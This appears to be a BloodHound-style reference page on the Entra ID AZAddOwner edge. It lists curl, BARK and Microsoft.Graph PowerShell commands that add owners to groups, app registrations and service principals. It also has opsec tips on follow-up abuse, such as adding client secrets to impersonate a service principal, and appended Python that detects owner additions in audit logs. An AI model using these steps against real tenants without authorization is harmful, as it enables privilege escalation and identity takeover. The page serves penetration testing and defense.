AZAddOwner

The source principal can add any principal as an owner of the target Entra ID object (group, app, or service principal).

Applies to: User / ServicePrincipal → AZGroup / AZApplication / AZServicePrincipal


Linux Abuse

Graph API — add owner to group (curl)

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

curl -s -X POST "https://graph.microsoft.com/v1.0/groups/<target-group-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<new-owner-object-id>\"}"

Graph API — add owner to app registration (curl)

curl -s -X POST "https://graph.microsoft.com/v1.0/applications/<app-object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<new-owner-object-id>\"}"

Graph API — add owner to service principal (curl)

curl -s -X POST "https://graph.microsoft.com/v1.0/servicePrincipals/<sp-object-id>/owners/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<new-owner-object-id>\"}"

Windows Abuse

BARK — add owner to Service Principal

$Token = Get-GraphTokenWithRefreshToken -RefreshToken '<refresh-token>' -TenantID '<tenant-id>'

New-ServicePrincipalOwner `
  -ServicePrincipalObjectId "<sp-object-id>" `
  -NewOwnerObjectId "<new-owner-object-id>" `
  -Token $Token

BARK — add owner to App Registration

New-AppOwner `
  -AppObjectId "<app-object-id>" `
  -NewOwnerObjectId "<new-owner-object-id>" `
  -Token $Token

BARK — add owner to Group

New-GroupOwner `
  -GroupObjectId "<target-group-id>" `
  -NewOwnerObjectId "<new-owner-object-id>" `
  -Token $Token

Microsoft.Graph PowerShell

# Microsoft.Graph SDK v2+ takes the token as a SecureString (v1 accepted a plain string)
Connect-MgGraph -AccessToken (ConvertTo-SecureString "<access-token>" -AsPlainText -Force)
# Group
New-MgGroupOwner -GroupId "<target-group-id>" -DirectoryObjectId "<new-owner-object-id>"
# Application
New-MgApplicationOwner -ApplicationId "<app-object-id>" -DirectoryObjectId "<new-owner-object-id>"
# Service Principal
New-MgServicePrincipalOwner -ServicePrincipalId "<sp-object-id>" -DirectoryObjectId "<new-owner-object-id>"

Opsec

  • Entra ID audit logs record every ownership change: actor, target object, new owner, timestamp.
  • Once you are an owner, follow up with AZOwns abuse (add secrets, add members, change app settings).
  • Adding yourself as owner of an app registration lets you add client secrets and impersonate the SP.
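The audit-log point above is where a defender gets traction. The following is an added example, not part of this edge page or of BloodHound: it reduces Entra ID directoryAudit records to successful owner additions and flags the self-assignment case the last bullet describes. The activityDisplayName strings, the targetResources ordering and the sample records are assumptions constructed for the example; check them against your tenant's real log output before relying on them.

```python
import json
from dataclasses import dataclass

# activityDisplayName values Entra ID uses for the ownership changes this page covers,
# mapped to the BloodHound node type that gains an owner (assumed; verify in your logs).
OWNER_ADD_ACTIVITIES = {
    "Add owner to group": "AZGroup",
    "Add owner to application": "AZApplication",
    "Add owner to service principal": "AZServicePrincipal",
}
@dataclass(frozen=True)
class OwnerAddEvent:
    timestamp: str
    actor: str           # user or service principal that made the change
    target_type: str     # AZGroup / AZApplication / AZServicePrincipal
    target_id: str       # object that gained an owner
    new_owner: str       # principal that was added as owner
    self_assigned: bool  # actor added itself, the pattern the Opsec notes describe
def actor_of(record):
    """initiatedBy carries a user block or an app block; return whichever id is set."""
    who = record.get("initiatedBy", {})
    if who.get("user"):
        return who["user"]["id"]
    return who.get("app", {}).get("servicePrincipalId", "unknown")
def find_owner_additions(records):
    """Reduce directoryAudit records to successful owner additions. Assumed (constructed)
    layout: targetResources[0] is the new owner, [1] the object that gained the owner."""
    events = []
    for rec in records:
        target_type = OWNER_ADD_ACTIVITIES.get(rec.get("activityDisplayName"))
        if target_type is None or rec.get("result") != "success":
            continue
        new_owner, owned = (t["id"] for t in rec["targetResources"][:2])
        actor = actor_of(rec)
        events.append(OwnerAddEvent(rec["activityDateTime"], actor, target_type,
                                    owned, new_owner, actor == new_owner))
    return events
# Constructed sample records shaped like /auditLogs/directoryAudits output; the third is a membership change and must be ignored.
SAMPLE_LOG = json.loads("""[
 {"activityDateTime": "2024-05-01T10:00:00Z", "activityDisplayName": "Add owner to application",
  "result": "success", "initiatedBy": {"user": {"id": "u-111"}},
  "targetResources": [{"id": "u-111", "type": "User"}, {"id": "app-aaa", "type": "Application"}]},
 {"activityDateTime": "2024-05-01T10:05:00Z", "activityDisplayName": "Add owner to group",
  "result": "success", "initiatedBy": {"app": {"servicePrincipalId": "sp-222"}},
  "targetResources": [{"id": "u-333", "type": "User"}, {"id": "grp-bbb", "type": "Group"}]},
 {"activityDateTime": "2024-05-01T10:06:00Z", "activityDisplayName": "Add member to group",
  "result": "success", "initiatedBy": {"user": {"id": "u-111"}},
  "targetResources": [{"id": "u-444", "type": "User"}, {"id": "grp-bbb", "type": "Group"}]}
]""")
```

Feed it the records returned by Microsoft Graph's /auditLogs/directoryAudits endpoint and alert on every event, with the self_assigned ones first.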